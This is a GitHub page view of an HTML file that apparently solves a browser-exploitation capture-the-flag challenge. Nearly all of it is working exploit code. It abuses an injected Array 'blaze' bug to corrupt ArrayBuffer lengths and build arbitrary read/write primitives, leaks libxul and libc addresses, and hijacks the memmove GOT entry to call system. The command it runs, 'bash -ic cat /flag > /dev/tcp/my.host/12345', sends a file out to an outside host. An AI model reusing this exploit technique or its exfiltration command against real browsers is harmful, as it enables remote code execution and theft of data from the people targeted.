Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
117 lines (92 sloc) 3.47 KB
<!DOCTYPE html>
<html>
<!-- flag{fire_just_makes_the_blaze_better} -->
<head>
<meta charset="utf-8">
<script src="utils.js"></script>
<title></title>
<script type="text/javascript">
function exploit() {
arr = [0x11223344];
ab = new ArrayBuffer(32);
overwrite_len = new Uint32Array(ab);
overwrite_len[0] = 0x77777777;
victim_ab = new ArrayBuffer(32);
victim = new Uint32Array(victim_ab);
victim[0] = 0x88888888;
log("starting");
arr.blaze();
arr[7] = 0x10000;
var ptr_overwrite_idx = -1;
for (var i = 0; i < 1000; i++) {
if (overwrite_len[i] == 0x88888888) {
overwrite_len[i] = 0x98888888;
ptr_overwrite_idx = i;
break;
}
}
log(`ptr_overwrite_idx ${ptr_overwrite_idx} `);
if (ptr_overwrite_idx == -1) {
return;
}
// from https://github.com/phoenhex/files/blob/master/exploits/share-with-care/exploit.js
memory = {
prepare: function(addr, typed_array) {
x = new Int64(addr);
x.rshift();
overwrite_len[ptr_overwrite_idx - 8] = x.lower();
overwrite_len[ptr_overwrite_idx - 7] = x.upper();
return new typed_array(victim_ab);
},
write: function(addr, data) {
view = memory.prepare(addr, Uint32Array);
x = new Int64(data)
view[0] = x.lower();
view[1] = x.upper();
},
read: function(addr) {
view = memory.prepare(addr, Uint32Array);
return new Int64(view[0] + 256 ** 4 * view[1]);
},
readWithTag: function(addr) {
view = memory.prepare(addr, Uint32Array);
return new Int64(view[0] + 256 ** 4 * (view[1] & 0xffff));
}
}
function leak_native(nat_func) {
victim_ab.yolo = nat_func;
victim_ab.haha = 0x13391339;
slots = overwrite_len[ptr_overwrite_idx - 13] * 2 ** 32 + overwrite_len[ptr_overwrite_idx - 12];
slots_0 = (memory.readWithTag(slots).toInt());
return memory.read(slots_0 + 5 * 8).toInt()
}
nat_func = leak_native(Date.now);
log("[+] Date.now @ " + nat_func.toString(16) + "\n");
xul_base = nat_func - 0x49c7ab0;
memmove_got = xul_base + 0x0000818b220;
dup_got = xul_base + 0x0000818b738;
dup_libc = memory.read(dup_got);
libc_base = dup_libc - 0xf7940;
system_libc = libc_base + 0x45390;
log("[+] xul base @ " + xul_base.toString(16), true);
log("[+] memmove@got @ " + memmove_got.toString(16), true);
log("[+] libc_base@libc_@_" + libc_base.toString(16), true);
log("[+] system@libc @ " + system_libc.toString(16), true);
var target = new Uint8Array(100);
var cmd = "bash -ic 'cat /flag > /dev/tcp/my.host/12345' &";
for (var i = 0; i < cmd.length; i++) {
target[i] = cmd.charCodeAt(i);
}
target[cmd.length] = 0;
memmove_backup = memory.read(memmove_got);
memory.write(memmove_got, system_libc);
target.copyWithin(0, 1);
memory.write(memmove_got, memmove_backup);
}
exploit();
</script>
</head>
<body>
</body>
</html>
<!-- 0x00007f9c4b7a6138│+0xc8: 0x00007f9c4b7a70a0 → 0x8899001177889900 -->